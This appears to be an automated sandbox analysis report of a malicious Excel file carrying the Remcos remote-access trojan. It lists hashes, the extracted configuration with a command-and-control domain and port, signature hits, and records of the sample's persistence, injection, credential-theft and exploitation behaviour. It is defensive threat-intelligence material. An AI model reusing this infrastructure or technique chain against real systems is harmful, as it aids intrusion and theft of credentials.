remcos | ec5062b6c5c6648b188b29b28741d4911a36986ec5adccad8ecffa5e8b41734b

Analysis

max time kernel
152s
max time network
162s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19-03-2024 03:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ec5062b6c5c6648b188b29b28741d4911a36986ec5adccad8ecffa5e8b41734b.xls
Size

49KB
MD5

de81ca904b88240d1bdf3e6ce5211367
SHA1

04b96d917496857a4e5cafd042e1594323437a5b
SHA256

ec5062b6c5c6648b188b29b28741d4911a36986ec5adccad8ecffa5e8b41734b
SHA512

c52d1d62b0c73527ed2d4ea2a93444b2904c3e91d8b3296300c9c87ee8d288b23e0f779b4f3851886c230c5be8e84b15ee456eea086a7070444c1049d5bb7373
SSDEEP

1536:hX682vSrL9JfQsZvYjOEpE0Ff9hZ+U04mjDP:hX682arL9Cd6unv

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

buike0147.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1C7Y8W
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 18 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2788-220-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-221-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-222-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-223-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-219-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-226-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-228-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-231-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-233-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-234-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-235-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-236-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-237-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-238-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-240-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-285-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-286-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2788-287-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Detects executables built or packed with MPress PE compressor 22 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2108-243-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-248-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2108-247-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-252-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2108-251-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2108-256-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-258-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2108-259-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-260-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-265-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-267-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-268-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-270-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1848-271-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2108-276-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2788-278-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2788-282-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2788-281-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2788-283-0x0000000010000000-0x0000000010019000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2108-256-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2108-259-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2108-276-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2108-256-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2108-259-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1008-262-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1008-264-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1848-268-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1848-270-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1848-271-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2108-276-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1008-284-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 8 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow	pid	process
13	1516	EQNEDT32.EXE
16	2068	WScript.exe
18	2068	WScript.exe
20	1716	powershell.exe
22	1716	powershell.exe
24	1716	powershell.exe
25	1716	powershell.exe
28	1716	powershell.exe

Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\MAAH.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 1716 set thread context of 2788	1716	powershell.exe	RegAsm.exe
PID 2788 set thread context of 2108	2788	RegAsm.exe	RegAsm.exe
PID 2788 set thread context of 1008	2788	RegAsm.exe	RegAsm.exe
PID 2788 set thread context of 1848	2788	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1516 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
1516	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2872 EXCEL.EXE
